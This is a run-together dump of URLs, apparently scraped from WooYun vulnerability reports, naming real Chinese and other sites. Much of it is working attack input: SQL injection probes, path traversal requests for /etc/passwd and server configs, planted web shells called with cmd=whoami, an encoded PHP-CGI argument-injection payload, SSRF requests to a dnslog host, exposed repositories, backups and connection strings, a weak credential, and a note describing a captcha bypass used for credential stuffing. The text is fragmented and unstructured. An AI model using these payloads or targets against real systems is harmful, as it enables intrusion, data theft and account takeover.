http://180.97.187.30:8080/dbbackup/backup/sea.jsp http://lady.mop.com/news/bencandy.php?fid=47&aid=908 www.88xgmm.com www.ao114.com www.jf14.com www.qj01.com www.88xgmm.com www.qj01.com http://video.baicmotor.com http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1%20order%20by%205 http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1%20order%20by%206 http://video.baicmotor.com/wooyun.jsp?cmd=whoami http://wap.5262.com/index/notice?action=list&mstatus=1 ftp://58.57.131.226/ ftp://58.57.131.226/%B8%F6%C8%CB_%CB%EF%BA%A3%CC%CE/VPN.txt https://ssl.slof.com/yqjs http://**.**.**.**/login.action http://v2.shenzhenair.com/ http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%205 http://v2.shenzhenair.com/Conf/jsp/systembulletin/bulletinAction.do?operator=state&sysId=1%20order%20by%206 http://v2.shenzhenair.com/wooyun.jsp?cmd=whoami http://promotion.elong.com/other/about-web/web-addr.html http://efc.corp.elong.com/ host:192.168.116.64 http://www.test58static.com/html原型/ host:192.168.9.58 www.test58static.com http://ui.elong.com/ host:192.168.15.42 http://www.juneyaoair.com http://reci.zhenai.com/ http://reci.zhenai.com/reci.zhenai.com.rar http://reci.zhenai.com//zb_users/AVATAR/2.asp http://aihu.uhuacall.com:8088/index.php/runlog/feedback/index http://aihu.uhuacall.com:8088/index.php/runlog/feedback/index http://**.**.**/loginfrom=%2F_ Bcast:0.0.0***** fefe:9***** http://app.finance.ifeng.com/money/insurance_rs_detail.php?qtype=id&query=259 http://www.cheshi.com/c_ankang http://www.602.com:80/ www.602.com http://218.206.27.196:8788//bbs_show//images//upload//2016//04//03//web//193de376a03345c7a98d3693f02bf978.jsp http://218.206.27.196:8787/bbs_cms/system/login/init.action 
http://218.206.27.196:8787/bbs_cms/front/user/getUserInfoByID.action?userId=911a6a582f9049849d990ff85aa32ef7 id:d6ab8cc752e045b097639b11dd3a2e3c http://218.206.27.198:8080/city/api.php?op=platform&opCode=bandemail&method=account.mailActivate&email=aKvpxU1LekEffCesG4urtMAhPi5tijWqiHagNi1NqR0D46xF4GvjqbcMi0g&userId=8172049076684e6c985dac8b17721373&type=2 http://recordser.iflytek.com/ http://recordser.iflytek.com/UserContent/UserContentList http://recordser.iflytek.com/UserContent/UserList http://recordser.iflytek.com/UserContent/TaskList http://recordser.iflytek.com/InspectTask/UserList http://recordser.iflytek.com/InspectTask/TaskList http://recordser.iflytek.com/App/Index http://api.sina.cn/sinago/newuser.json?uid=dca2233cf7ec72e0&from=6049595012&wm=b207&new_uid=34b2e8f98ae54688f527885903b0aa17a54bfcdf&chwm=16094_0003&imei=355795053630675 http://pro.zhongjiu.cn/20141209/shouji/shouji.html http://api1.zhongjiu.cn/Order.checkAddress https://yun.netentsec.com/ http://push.wps.cn/wps_handpick_upd/?version=10.1.0.5559&distsrc=19.996 http://**.**.**.**/Website/newslist.jsp?ColumnCode=m0403 http://**.**.**.**/website/newsshowphoto.jsp?ColumnCode=l07 http://**.**.**.**/Website/contentshow.jsp?ColumnCode=m0301 http://**.**.**.**/Website/newslistm8001.jsp?ColumnCode=m8001 http://**.**.**.**/Website/newslistm0204.jsp?ColumnCode=m0204 http://**.**.**.**/Website/filelist.jsp?ColumnCode=02 http://123.125.123.62/zabbix/ http://video.baicmotor.com http://******/bugs/wooyun-2010-0143276 http://video.baicmotor.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23 http://223.72.160.7:8080/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=1 www.zcrj.org http://www.zcrj.org/1.asp http://**.**.**.**/bugs/wooyun-2010-0115201 
classes:/root/zookeeper-3.4.6/bin/../build/lib/*.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/root/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/root/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/root/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/root/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/root/zookeeper-3.4.6/bin/../conf amd64:/usr/lib64:/lib64:/lib:/usr/lib www.ofo.so/Api/getPacket url:http://crashreport.yy.com/crashreport/crashreport.php http://219.143.252.170/seeyon//logs/login.log http://219.143.252.170/seeyon https://mail.ceair.com jdbc:oracle:thin:@172.28.28.44:1531:p**p http://172.20.35.70/FlightDataService.asmx http://172.20.29.64/FlightDataService.asmx?WSDL/getArrFlightInfo http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/httpd/conf/httpd.conf http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd http://**.**.** https://mail.xdf.cn/owa/ http://www.webpowerasia.com/m/con.php?id=11 com:8888 pro.zhongjiu.cn/phone/20160219/s_sprgz.html&eurl=http%3A//pro.zhongjiu.cn/phone/20160323/s_mob.html&etime=1459748113&ctime=1459748381 http://api1.zhongjiu.cn/getSGList https://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://XXXXXXX/?ADTAG=MAIL.2.000.287&mailid=FQkIfAQHAwkJBQMUCQEABAcFCAYHBR0BCQMGBgUIAAAC&spam=0 https://mail.qq.com/cgi-bin/mail_spam?action=check_link&url=http://www.baidu.com/?ADTAG=MAIL.2.000.287&mailid=FQkIfAQHAwkJBQMUCQEABAcFCAYHBR0BCQMGBgUIAAAC&spam=0 http://58.22.102.187/ http://e.1905.com/Wechatdev http://58.22.102.187/.git http://3g.mop.com/mobile.html FF:5A:F9:BF:FC:2F&netType=WIFI&netSubType= http://bb.mop.com/login.do http://**.**.**.** http://**.**.**.**/admin/ 
http://**.**.**.**/domainForm.do?domainId={域名ID http://211.151.133.195 https://portal.qiyi.domain/newportal/?appkey=all_racks http://211.151.133.195/plugin/getfile?name=../../../../../../etc/hosts&pluginId=3 http://211.151.133.195/plugin/getfile?name=../views.py&pluginId=3 http://quote.skyworth.com/Default.aspx http://c.cheyipai.com/admin/login http://124.250.37.126:8080/agent_portal/ http://**.**.**/bugs/wooyun-2016-0192133_ http://**.**.**/_ http://**.**.**/jeeadmin/jeecms/index.dolocale=zh_CN_ http://**.**.**/r/cms/www/22.html_ http://admin.gm.ledu.com/admin https://60.173.222.35/才知道哦 http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute data:TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue= http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../../../etc/passwd http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../conf/server.xml http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../root.sh http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438 site:c1.cevone.cn http://183.232.64.203/?r=login/index http://183.232.64.203/.svn/entries http://113.106.86.133:8090/admin/login.action http://my.51job.com/cv/CResume/CV_PResume.php?ReSumeID=343783840 
https://yun.netentsec.com/main/index/pwfind?action=pwfind¶ms=eyJ1c2VyaWQiOiIxOSIsInVzZXJuYW1lIjoibmV0ZW50c2VjIiwibWFpbCI6ImhhemFyZDA4QDEyNi5jb20iLCJocmVmIjoiaHR0cDpcL1wvbWFpbC4xMjYuY29tIn0=# http://**.**.**.**/delay_loader.php?d=d&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://**.**.**.**/ http://**.**.**.**/help.jspx URL:http://xueyuan.weibo.com/course/index?key_word=1 http://xueyuan.weibo.com/course/index?key_word=1%'and'%'= http://xueyuan.weibo.com/course/index?key_word=1%'and'%'='1 http://xueyuan.weibo.com/course/index?key_word=$_GET[key_word http://dictfeedback.corp.youdao.com http://dict.youdao.com/feedback/open/feedback/add http://113.106.86.134/ http://113.106.86.134/pma/ http://113.106.86.134/233.php http://**.**.**.**/adminUser/loginAction http://**.**.**.**/ http://try.fashion.sina.com.cn/home/api/?callback=jQuery18201201861931476742_1459425891527&s=front&a=get_beauty_branch&order=time&page=1&size=1&branch=34&_=1459425891539 https://**.**.**.**/ https://**.**.**.**:9090/ http://**.**.**.**//index.aspx?JiGouBianHao=430100 http://**.**.**.**/Modules/XingZhengXuKe/XuKeShenQing.aspx?JiGouBianHao=430000 http://**.**.**.**/Modules/XingZhengXuKe/XuKe_List.aspx?JiGouBianHao=430000 http://**.**.**.**/modules/xingzhengxuke/xuke_list1.aspx?jigoubianhao=430000&list_id=4791 http://www.ponhu.cn/index.php/Adminph/Yijian/index http://www.ponhu.cn/index.php/Adminph/Yijian/index http://nic.ccut.edu.cn/nic.sql http://www.bxd365.com/mopinion/index?page=5 http://www.bxd365.com/vadmin/index http://www.mysongktv.com http://www.mysongktv.com/zhongchou_bookyz.php http://www.mysongktv.com/wz_admin/left.php# http://www.mysongktv.com/wz_admin/article_edit.php?cid=3&id=43 http://wooyun.org/bugs/wooyun-2010-0137397 http://blog.travel.e-picclife.com/Upload/Temp/20160405/201604051641109840935.aspx http://wooyun.org/bugs/wooyun-2015-0146836 xf.house.163.com/sz/qa/goodOrNo/0QWZ.html jdbc:oracle:thin:@**.**.**.**:1521/bjess 
http://psapp.wine9.com/index.php/User/login/ce16f73b5c31c37760f811d6c6f80b39 http://psapp.wine9.com/index.php/BBS/GetReplyList/ce16f73b5c31c37760f811d6c6f80b39?id=2874&index=1&pagesize=10 http://psapp.wine9.com/index.php/User/getUserInfo/ce16f73b5c31c37760f811d6c6f80b39?session_id=0c64a3fad5aef75202bb2a7175035634&sign=bea76696f05aeff6d42c8aa951010b09&uid=647836 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2262620 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=1550325 http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2227655 http://api.yiyizuche.cn/ http://cloud.yiyizuche.cn/ https://win.foundersc.com/ http://172.16.27.188/ks-main/web/login http://192.168.132.35/ks-main/web/login http://scwx.e-chinalife.com/staff/prepare_query_staff.action http://scwx.e-chinalife.com http://115.182.85.143:8081/back/frame/getFrame.do http://115.182.85.143:8081/ http://m.youdao.com/softupdate?keyfrom=mdict.6.2.1.iphonepro&imei=11111111111111111111111111111111&model=iPhone8,1&deviceid=11111111111111111111111111111111&mid=9.3.1&username=%28null%29&vendor=AppStore&userid=&idfa=564443CC-9189-42C1-9CC9-0922116AD5C4&abtest=3&ssid=123123 http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21 http://182.92.192.87:8090/Default.aspx index.aspx/personfindname http://hotelbid.wandahotels.com/万达酒店建设有限公司招标管理系统 http://www.cheyipai.com http://dacp.asiainfo.com/forgetPwd.html http://ca.10jqka.com.cn/ http://ca.10jqka.com.cn/ca/index/login http://**.**.**.**/ http://notefeedback.corp.youdao.com http://note.elibom.youdao.com/soft-manager/feedback 
http://note.elibom.youdao.com/soft-manager/feedback?backurl=manual&amp;amp;action=login&amp;backURL=http://note.elibom.youdao.com/noteproxy/login?todo=LoginWapNote&backurl=manual&amp;soft=note&soft=note&mtype=&mid=&imei=&isSubmited=true http://**.**.**.**/bugs/wooyun-2015-0163363 http://www.dns0755.net/ns.php?sid=29 http://www.shenghui56.com/ www.shenghui56.com http://www.shenghui56.com http://service.homelink.com.cn/wct/userfiles/agent/pressImages/201604132837image.jsp?pwd=023&i=whoami http://service.homelink.com.cn/wct/userfiles/agent/pressImages/201604132837image.jsp?pwd=023&i=arp imap://MailServer:Port/fetch imap://**.**.**.**:993/fetch%3EUID%3E/INBOX%3E1 mailbox:///C:/Users/用户名/AppData/Roaming/软件名/随即字符串/Mail/**.**.**.**/Inbox?number=ID imap://**.**.**.**:993/fetch http://school.activetech.com.cn http://**.**.**.** http://**.**.**.**/Conf/jsp/main/mainAction.do http://ha.picchealth.com/index.aspx http://ha.picchealth.com/PwdSave.aspx admin:123456 http://**.**.**/ http://htleasing.cn/About.aspx?CateId=2 http://**.**.**/bea_wls_internal/test.jsp jdbc:oracle:thin:@10.10.136.238:1521:ORCL www.caifupad.com http://en.satrip.com/AboutUs/Contact.asp?Flag=3 http://**.**.**/paybank/_ https://**.**.**/_ http://**.**.**/paybank/jump.jsp_ https://**.**.**/list.html_ http://**.**.**/paybank/14n.jsp http://**.**.**.**/bugs/wooyun-2015-0137474 http://221.176.142.10:8010 http://59.46.9.16/的百度云备案系统 http://update.appstore.vivo.com.cn/port/packages_update/ www.yrhx.com http://sd.91huayi.com http://**.**.**/loginfrom=%2f_ e6:4***** e6:4c:bc***** f2:bc***** e6:4b:7c***** e6:4c:b***** f3:2***** http://info.peaksport.com/UpdateLog/UpdateList.aspx?UpdateYearMonth=201307 http://info.peaksport.com/UpdateLog/UpdateList.aspx?ModuleID=1 http://info.peaksport.com/UpdateLog/UpdateList.aspx?LogID=174 http://rdm.iflytek.com:2000/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://**.**.**.**/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000&"& 
http://221.4.136.214/ http://221.4.136.214/backup.zip http://218.5.173.228:90/CmxDownload.php http://218.5.173.228:90/Client/CmxAbout.php http://*******/bugs/wooyun-2010-0130866 http://www.genlot.com:3000/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000 http://www.emaotai.cn/wapshop/ProductList.aspx?categoryId=77&keyWord= https://win.foundersc.com/prx/000/http/localhost/welcome/index.html http://**.**.**.**/bugs/wooyun-2016-0190513这个漏洞继续查找中国移动其他身份相似系统,找到个宁夏移动的,虽然没有弱口令,但其另外一个系统存在SQL注入,且两个系统挂在同一个数据库服务器上 http://58.215.43.162/osoa/views/index.html?r=0.9203477809205651 http://58.215.43.162//%20../web-inf/ http://**.**.**.**:2080/pms-service/broadcast/broadcast_program_list?channelId=22&dateTime=2016-04-04+23%3A51%3A14&portalId=14 http://**.**.**.**:2080/pms-service/broadcast/broadcast_program_list?channelId=22&dateTime=2016-04-04+23:51:14%27%20XOR%28IF%28%285189=5189%29,BENCHMARK%286000000,MD5%280x48705554%29%29,5189%29%29%20AND%20%27FImz%27=%27FImz&portalId=14 http://**.**.**.**/bugs/wooyun-2016-0170564 http://**.**.**.**/bugs/wooyun-2016-0170564 com:8888 http://**.**.**.**:443/Conf/jsp/main/mainAction.do http://**.**.**.**/bugs/wooyun-2010-0143276 http://**.**.**.**:443/wooyun.jsp www.sudiyi.cn http://**.**.**/loginfrom=%2f_ 
ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm& ws.cdn.baidupcs.com/file/c8403d299a2db4104879372be2ca130bbkt=p2-nb-196&xcode=f3dad2a2733c26fac7d56582f6e916de903efae2841e1696f77424e07ee197d9&fid=3305421553-250528-737258585075065&time=1449799931&sign=FDTAXGERLBH-DCb740ccc5511e5e8fedcff06b081203-B%2BOuxFVHurP5q8k1HAxDua1ffpg%3D&to=lc&fm=Nin,B,M,ny&sta_dx=210&sta_cs=16&sta_ft=zip&sta_ct=6&fm2=Ningbo,B,M,ny&newver=1&newfm=1&secfm=1&flow_ver=3&pkey=1400c8403d299a2db4104879372be2ca130bfdd91aab00000d184675&sl=79495247&expires=8h&rt=sh&r=876939559&mlogid=7988191254902820211&vuk=3473100178&vbdid=2766612220&fin=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&fn=confluence-wiki-5.6.5%E5%AE%89%E8%A3%85%E7%A0%B4%E8%A7%A3%E6%B1%89%E5%8C%96.zip&slt=pm&uta=0&rtype=1&iv=0&isw=0&dp-logid=7988191254902820211&dp-callid=0.1.1&wshc_tag=0&wsts_tag=566a30fd&wsid_tag=8ba202ac&wsiphost=ipdbm& root:/roo***** sbin:/usr/***** nc:/bin:/***** games:/usr/***** man:/usr/***** lpd:/usr/***** mail:/usr/s***** news:/us***** uucp:/***** bin:/usr***** www:/us***** backups:/us***** ager:/var/list:***** ircd:/usr***** 
http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://180.97.36.23/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../home/img/odp/log/access_log http://180.97.33.195/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../home/img/odp/webroot/pcheck/index.php http://180.97.33.195/pcheck/index.php?action=../../../../../../../../../../home/img/odp/log/access_log%00&report=1 http://123.59.58.72/ http://txd.tangdou.com http://123.59.58.72 http://www.lvmama.com/trip/show/ajaxGetCommon http://202.108.12.127/ http://sms.sf-express.com http://sms.sf-express.com/loginmgmt/login.action http://etc.ccut.edu.cn/type.asp?id=1391 http://etc.ccut.edu.cn/type.asp?id=1391 http://**.**.**.**//Service/ComService.svc http://**.**.**.**/jsp/society/societyOwner.jsp http://202.108.12.230/ http://60.255.50.1:8080/seeyon/ http://60.255.50.1:8080/seeyon//logs/login.log http://**.**.**.**:8080/admin/login http://**.**.**.**:8080/pro/login svn://**.**.**.**/ http://**.**.**.**/p2padmin/ http://jira.**.**.**.**/ http://pan.gyey.com/ http://116.228.243.162:9000/pdm/Login http://219.239.205.152/ http://qiaodan.com/e/cpdh.php?classid=1 http://www.qiaodan.com/VIP/php.php http://www.qiaodan.com/VIP/sea.php https://github.com/summerrc/bilibili http://wybjpkc.henu.edu.cn/regform.php?membertypeid=12%20where%201 URL:http://**.**.**.** http://**.**.**.**:7001/ http://**.**.**.**/bugs/wooyun-2016-0173342 http://dzswsw.yxk.ccut.edu.cn/pic.asp?w=1&s_hh=200&id=468 http://**.**.**.**/bugs/wooyun-2016-0173342 http://**.**.**.**:82/fire/login.action http://**.**.**.**:84/notesys/superlogin.jsp http://**.**.**.**/bugs/wooyun-2015-0136031 https://**.**.**.**/cqvZn5BQMk5q2 https://**.**.**.**/cqvZGXZPhKpNr http://lady.mop.com/admin/ http://health.mop.com/admin/ http://society.mop.com/admin/ http://**.**.**/RSC/_ 
http://**.**.**/RSC/qq.jsp http://chexian.sinosig.com/Net/netCarInfoControl!returnFirstStep.action?paraMap.id=320000 http://61.135.131.153/ http://**.**.**.**/link?url=voTDWhx82NQaCYRe9JGAbzuPxDjetIru7aYlyyl7EFpVEOofDyRykcDYdPQNGmitPvCrco9_mcFQhheNDu4YYsKP7e01YDsCx4MBLzPX6CK http://**.**.**/RSC/ http://**.**.**/RAS/test.jsp http://**.**.**/RAS/_ http://app.art.ifeng.com/?app=system&controller=fall&tag=%25E6%25A3%25AE%25E6%259E%2597*&action=tagspage&jsoncallback=jsonp1460102650253&page=2&_=1460102652833&size=50 http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff http://182.151.210.184:8888 https://mail.jinlianchu.com/extmail/cgi/env.cgi http://info.ca.315i.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://info.coalchem.315i.com/uddiexplorer/SearchPublicRegistries.jsp?operator= http://gas.315i.com/common/goArticleList?productIds=002003%2C002&type=0&columnIds=007002 http://oil.315i.com/common/goArticleList?productIds2=001015&productIds=001010&type=1&columnIds=001021&productId=001015 http://202.131.75.66/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E 
http://eqxiu.com/home/login,输入用户名和密码发现两三次错误后就会提示要拖动进行验证,正确进行拖动,然后点击登陆,此时抓包,可以看到只要geetest_validate与geetest_seccode参数处保持一致就能够绕过验证,进行撞库。这里撞库获得1300多个账号,进一步发现登陆后输入http://eqxiu.com/usercenter/member,抓包有一个http://eqxiu.com/m/u/info的包会返回账号秀点值,秀点可是要拿钱买的,用撞库获得的账号,获取JSESSIONID,替换http://eqxiu.com/m/u/info包中的JSESSIONID,从而可知各用户的秀点值。 http://bbs.cheshi.com/space.php?uid=1007445 http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1* http://appapi.yc.ifeng.com/web/qy_comments.php?a=shuping_index&articleid=1 http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1* http://www.saclub.com.cn/ www.saclub.com.cn http://m.yiihuu.com/zyxz/?q=1 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1&peerID=986CF557EB73004V&productID=37&type=ad&version=5.15.2.3820&versionCode=10560 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1%27%20or%201=1%20--%20-&peerID=986CF557EB73004V&productID=37&type=ad&version=5.15.2.3820&versionCode=10560 http://m.sjzhushou.com/cgi-bin/homepage?imeiID=863890026674804&partnerID=1 http://www.h3c.com.cn/pub/2015_Event/H3CB_2015/bottom_9.html http://hz.meilishuo.com/css/get.php?url=svn.meilishuo.com intent://#Intent;S.extraction=goto_page;S.jump_config={"jump":{"type":4,"url":"**.**.**.**/baidudemo.html?ju=1","title":"title","fParam":"","filter_type":1}};SEL;component=com.baidu.appsearch/com.baidu.appsearch.EmptyActivity;end http://**.**.**.**:8001 http://www.whu-sh.org/news_data.php?cid=1 encap:Ethernet fe8c:655d/64 Scope:Link MTU:1500 packets:208811177 packets:166174545 txqueuelen:1000 http://ebk.17u.cn/zizhuyou/ http://csmsg.focus.cn/group/vinvite.php http://218.17.224.215:8082/ http://218.17.224.215:8082/obj/Debug/SFWCFService.dll http://scan.cninsure.net/filemanager/login.do http://www.xiabu.com/?c=forgot http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml 
http://**.**.**.**:8014/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://myerp.public.apsva.us/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://**.**.**.**:8000/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml https://**.**.**.**.kw/OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml http://203.195.162.226:8080/ http://203.195.162.226:8080/logRecord/show/5105339 http://www.cninsure.net/News/NewsInfo.aspx?ID=8162 http://203.195.162.226:8080/logRecord/list http://203.195.162.226:8080/logRecord/show/5105339 http://203.195.162.226:8080/logRecord/show/5105340 http://203.195.162.226:8080/logRecord/show/5105341 http://space.bilibili.com/ajax/member/getCoinVideos?mid=9616637&pagesize=100 http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId={TARGET http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb 
http://66ae2b.dnslog.info/aabb http://**.**.**.**:8014//OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**.au/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://ofweb.**.**.**.**:8051/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb https://**.**.**.**:4453/OA_HTML/help/state?navId=2&navSetId=iHelp&vtTopicFile=iHelp/HelpServlet/US/FND/@ada_statement&vtTopicId=http://66ae2b.dnslog.info/aabb http://dia.58.com/phpmyadmin/ http://www.bj-cnpl.com http://www.bj-cnpl.com/showstate.asp?orderno=CI065580410JP*&x=38&y=1 http://m.focus.cn/zhongchou/gz/261/yaohao/?mobile=1* http://s1.api.tv.itc.cn/v6/mobile/channel/list.json?sysver=7.1.1&sver=1*&plat=3&channel_list_type=3&build=5.5.0.2&partner=1&api_key=695fe827ffeb7d74260a813025970bd5&poid=1 https://contact.mercedes-benz.com.cn/brochure/step2/?model=35&fromoutside=s65l-amg-emb&language=cn http://www.lvgou.com/incubator?city=-1 jdbc:oracle:thin:@**.**.**.**:1521:orcl http://channelsys.netentsec.com/ http://yjsy.dept.ccut.edu.cn/article.asp?5x3g1t3W2B183.html 